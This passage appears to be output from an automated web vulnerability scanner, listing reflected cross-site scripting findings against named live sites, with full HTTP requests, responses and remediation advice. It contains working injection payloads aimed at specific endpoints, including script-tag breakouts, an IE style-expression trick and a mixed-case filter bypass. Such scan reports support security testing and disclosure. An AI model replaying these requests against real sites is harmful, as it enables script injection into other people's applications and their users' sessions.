HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:47:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7312 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:57:34 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59db2'%3balert(1)//9b9954c8af4 was submitted in the site parameter. This input was echoed as 59db2';alert(1)//9b9954c8af4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=sm8doblu59db2'%3balert(1)//9b9954c8af4 HTTP/1.1 Host: sm8.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.doblu.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:47:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7312 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:57:35 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8be45'%3balert(1)//3488e5cb940 was submitted in the site parameter. This input was echoed as 8be45';alert(1)//3488e5cb940 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=sm9usv9158be45'%3balert(1)//3488e5cb940 HTTP/1.1 Host: sm9.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.usv.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:41:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7314 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:51:50 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc92e'%3balert(1)//1aa60633c69 was submitted in the site parameter. This input was echoed as fc92e';alert(1)//1aa60633c69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=sm9usv915fc92e'%3balert(1)//1aa60633c69 HTTP/1.1 Host: sm9.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.usv.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:41:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7314 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:51:51 GMT Cache-control: private
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ce1a1<script>alert(1)</script>4cc687ebe31 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8e17<a>aa7e4258d7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef400<a>8cf1a79cdef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d536<a>633a337d8a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72196<a>e91b413f6c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the hu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 471a6'%3balert(1)//a38518579b1 was submitted in the hu parameter. This input was echoed as 471a6';alert(1)//a38518579b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the hu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 633f3'%3balert(1)//03e1df6d800 was submitted in the hu parameter. This input was echoed as 633f3';alert(1)//03e1df6d800 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.306. http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4e24</script><script>alert(1)</script>3aa2e652384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/?c4e24</script><script>alert(1)</script>3aa2e652384=1 HTTP/1.1 Host: thenextweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://turntable.fm/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload 9c860<script>alert(1)</script>4e61d234a25 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 89cd4<script>alert(1)</script>82f44aae1b0 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 5c662<script>alert(1)</script>8e391233aea was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 91085<script>alert(1)</script>4f10be3052c was submitted in the siteId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload d8a29<script>alert(1)</script>d20c27704f6 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the description_color request parameter is copied into the HTML document as plain text between tags. The payload d9956<script>alert(1)</script>bd6df5b51dc was submitted in the description_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the title_color request parameter is copied into the HTML document as plain text between tags. The payload a3990<script>alert(1)</script>47a2c7f5d5d was submitted in the title_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload facbb<script>alert(1)</script>68379aeb7d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 628f3<script>alert(1)</script>da9adac6a4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96c95<script>alert(1)</script>d310838e609 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fd731<script>alert(1)</script>a8145d037e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 118ce<script>alert(1)</script>44d8691605e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the br request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25dba"><a>56d8f40e6aa was submitted in the br parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the fl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29178"><a>6e4aa055633 was submitted in the fl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the jsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a644"><a>54f2c5b14d7 was submitted in the jsv parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
3.322. https://weblogin.bu.edu//web@login3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://weblogin.bu.edu
Path:
//web@login3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd03"><a>8d5babe57fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the _authref request parameter is copied into the HTML document as plain text between tags. The payload 4842b<script>alert(1)</script>4d8a65282d2b3ae69 was submitted in the _authref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Get New authref Error</title> </head><body><FONT color="#CC ...[SNIP]... <p>Could not look up (cussp-srv44842b<script>alert(1)</script>4d8a65282d2b3ae69)</p> ...[SNIP]...
The value of the _hostname request parameter is copied into the HTML document as plain text between tags. The payload be0c2<a>dfae92bebe2 was submitted in the _hostname parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the br request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe38"><a>65f2229c969 was submitted in the br parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the fl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbb"><a>ebd5cc1f14a was submitted in the fl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the jsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b7e"><a>98e1ecc0ecf was submitted in the jsv parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
3.328. https://weblogin.bu.edu/web@login3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://weblogin.bu.edu
Path:
/web@login3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b24f"><a>11ad2d59aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the file request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2faad"><script>alert(1)</script>df05f93dc21 was submitted in the file parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the level request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de5"><script>alert(1)</script>6cee332c591 was submitted in the level parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload 12e42<script>alert(1)</script>e3378580d6496993 was submitted in the comments parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the fund_other request parameter is copied into the HTML document as plain text between tags. The payload 2850d<script>alert(1)</script>f93343ad016b277d2 was submitted in the fund_other parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feed7"style%3d"x%3aexpression(alert(1))"940c04456a8 was submitted in the s parameter. This input was echoed as feed7"style="x:expression(alert(1))"940c04456a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6464d<script>alert(1)</script>0a04d11127a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9d3d<script>alert(1)</script>a87b17a654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb3dd<script>alert(1)</script>40238912d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09c0<script>alert(1)</script>8376028c408 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32197<script>alert(1)</script>aa4f56641d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96080<script>alert(1)</script>8638f1d9a94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d515d<script>alert(1)</script>4101219e30b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5951<script>alert(1)</script>2f6c28805da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6e64<script>alert(1)</script>53812307258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c657<script>alert(1)</script>9b4edb9dd3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 794da<script>alert(1)</script>91a3d6c19ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21e08<script>alert(1)</script>7cb01e04e3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5c8"><script>alert(1)</script>676f9ab27ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediace5c8"><script>alert(1)</script>676f9ab27ba/site/P8TH6404Q1P6NBW1/local_style.css?1317841651 HTTP/1.1 Host: www.magnify.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://content.usv.com/pages/john-buttrick Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=521b5ff4260f6b878ce5c1c7f175c254; path=/; expires=Thu, 06-Oct-2011 20:43:35 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 9666 Date: Wed, 05 Oct 2011 20:43:35 GMT X-Varnish: 1169893089 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://www.magnify.net/mediace5c8"><script>alert(1)</script>676f9ab27ba/site/P8TH6404Q1P6NBW1/local_style.css%0AServer: www.magnify.net%0APath: /mediace5c8"> ...[SNIP]...
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2630"><script>alert(1)</script>33c0a9efe42 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /birddog/widget_map.jsp?zoom=&markers=|47.38,8.54|47.38,8.54|47.38,8.54|45.8,15.97|35.44,139.64|37.27,-76.71|43.47,-80.51|43.47,-80.51|38.91,-77.04|38.9,-77.02|38.91,-77.02|38.91,-77.02|38.91,-77.04|52.26,21.02|52.23,21.02|52.26,21.02|54.7,25.27|54.7,25.27|46.8,7.11|48.22,16.37|48.22,16.37|48.46,-123.29|48.46,-123.29|49.28,-123.04|49.28,-123.11|49.27,-123.1|15.38,100.03|40.11,-88.21|48.4,9.97|62.03,-6.8|32.22,-110.97|63.44,10.4|43.74,-79.36|43.74,-79.36|39.06,-95.68|35.67,139.77|35.67,139.77|45.76,21.23|32.07,34.77|32.07,34.77|32.07,34.77|27.98,-82.34|59.44,24.74|25.02,121.45|-23.53,-46.63|-23.53,-46.63|-23.53,-46.63|-33.87,151.21|-33.87,151.21|-33.87,151.21|59.33,18.07|42.47,-83.29|-37.83,144.96|41.39,-81.44|42.69,23.31|42.69,23.31|42.67,23.44|25.03,121.56|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.84|37.56,126.99|37.56,126.99|37.56,126.99|47.61,-122.33|47.63,-122.33|47.61,-122.33|47.61,-122.33|34.02,-118.5|34.02,-118.5|34.03,-118.5|34.02,-118.5|34.42,-119.71|34.42,-119.71|37.39,-121.9|37.33,-121.89|37.78,-122.42|37.76,-122.42|37.78,-122.42|37.78,-122.42|37.79,-122.4|32.72,-117.17|32.72,-117.17|32.72,-117.17|32.72,-117.17|29.47,-98.53|29.47,-98.53|53.48,-2.31|34.57,135.48|38.65,-90.22|38.58,-90.24|38.58,-121.49|51.93,4.48|41.9,12.48|42.3,-89.13|42.27,-88.97|42.27,-88.99|43.17,-77.6|24.65,46.77&width=284&height=170.4c2630"><script>alert(1)</script>33c0a9efe42 HTTP/1.1 Host: www.meetup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:21:43 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC" X-Meetup-server: app17.int.meetup.com Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding,User-Agent Content-Length: 3814 Connection: close
The value of the height request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf434</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>feb3577a32d was submitted in the height parameter. This input was echoed as bf434</ScRiPt ><ScRiPt>alert(1)</ScRiPt>feb3577a32d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /birddog/widget_map.jsp?zoom=&markers=|47.38,8.54|47.38,8.54|47.38,8.54|45.8,15.97|35.44,139.64|37.27,-76.71|43.47,-80.51|43.47,-80.51|38.91,-77.04|38.9,-77.02|38.91,-77.02|38.91,-77.02|38.91,-77.04|52.26,21.02|52.23,21.02|52.26,21.02|54.7,25.27|54.7,25.27|46.8,7.11|48.22,16.37|48.22,16.37|48.46,-123.29|48.46,-123.29|49.28,-123.04|49.28,-123.11|49.27,-123.1|15.38,100.03|40.11,-88.21|48.4,9.97|62.03,-6.8|32.22,-110.97|63.44,10.4|43.74,-79.36|43.74,-79.36|39.06,-95.68|35.67,139.77|35.67,139.77|45.76,21.23|32.07,34.77|32.07,34.77|32.07,34.77|27.98,-82.34|59.44,24.74|25.02,121.45|-23.53,-46.63|-23.53,-46.63|-23.53,-46.63|-33.87,151.21|-33.87,151.21|-33.87,151.21|59.33,18.07|42.47,-83.29|-37.83,144.96|41.39,-81.44|42.69,23.31|42.69,23.31|42.67,23.44|25.03,121.56|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.84|37.56,126.99|37.56,126.99|37.56,126.99|47.61,-122.33|47.63,-122.33|47.61,-122.33|47.61,-122.33|34.02,-118.5|34.02,-118.5|34.03,-118.5|34.02,-118.5|34.42,-119.71|34.42,-119.71|37.39,-121.9|37.33,-121.89|37.78,-122.42|37.76,-122.42|37.78,-122.42|37.78,-122.42|37.79,-122.4|32.72,-117.17|32.72,-117.17|32.72,-117.17|32.72,-117.17|29.47,-98.53|29.47,-98.53|53.48,-2.31|34.57,135.48|38.65,-90.22|38.58,-90.24|38.58,-121.49|51.93,4.48|41.9,12.48|42.3,-89.13|42.27,-88.97|42.27,-88.99|43.17,-77.6|24.65,46.77&width=284&height=170.4bf434</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>feb3577a32d HTTP/1.1 Host: www.meetup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:21:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC" X-Meetup-server: app19.int.meetup.com Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding,User-Agent Content-Length: 3829 Connection: close
The value of the markers request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e5ed"%3bfe1437ff22d was submitted in the markers parameter. This input was echoed as 8e5ed";fe1437ff22d in the application's response.
